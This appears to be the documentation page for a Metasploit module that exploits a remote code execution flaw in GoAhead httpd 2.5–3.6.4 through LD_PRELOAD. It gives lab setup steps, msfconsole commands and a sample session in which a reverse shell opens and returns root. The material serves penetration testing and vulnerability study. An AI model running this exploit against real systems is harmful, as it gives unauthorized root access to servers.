HD Moore
1.8 KiB
1.8 KiB
Vulnerable Application
The GoAhead httpd server between versions 2.5 and 3.6.4 are vulnerable to an arbitrary code execution
vulnerability where a remote attacker can force a supplied shared library to be loaded into the process
of a CGI application. This module delivers a shared library payload as the raw data to a POST request
and forces this to be loaded by specifying a LD_PRELOAD value of /proc/self/fd/0.
Kali 2017.3 and Ubuntu 16.04 Install Instructions
These instructions are based on the vulerability analysis by elttam.com.au
git clone https://github.com/embedthis/goahead.git
cd goahead/
git checkout tags/v3.6.4 -q
make > /dev/null
cd test
gcc ./cgitest.c -o cgi-bin/cgitest
sudo ../build/linux-x64-default/bin/goahead
Verification Steps
Example steps in this format (is also in the PR):
- Install the application
- Start msfconsole
- Do:
use exploit/linux/http/goahead_cgi_exec - Do:
set rhost [ip] - Do:
exploit - You should get a shell.
Options
TARGET_URI
Optional. The full path to a CGI endpoint on the target server.
Scenarios
GoAhead 3.6.4 on Ubuntu 16.04 x64
[*] Processing goahead.rc for ERB directives.
resource (goahead.rc)> use exploit/linux/http/goahead_cgi_exec
resource (goahead.rc)> set verbose true
verbose => true
resource (goahead.rc)> set rhost 127.1.1.1
rhost => 127.1.1.1
resource (goahead.rc)> check
<TBD>
resource (goahead.rc)> exploit
[*] Started reverse TCP handler on 127.1.1.1:4444
[*] Sending Exploit to /cgi-bin/cgitest
[*] Command shell session 1 opened (127.1.1.1:4444 -> 127.1.1.1:45762) at 2017-12-23 17:12:39 -0500
uname -a
Linux goahead 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
whoami
root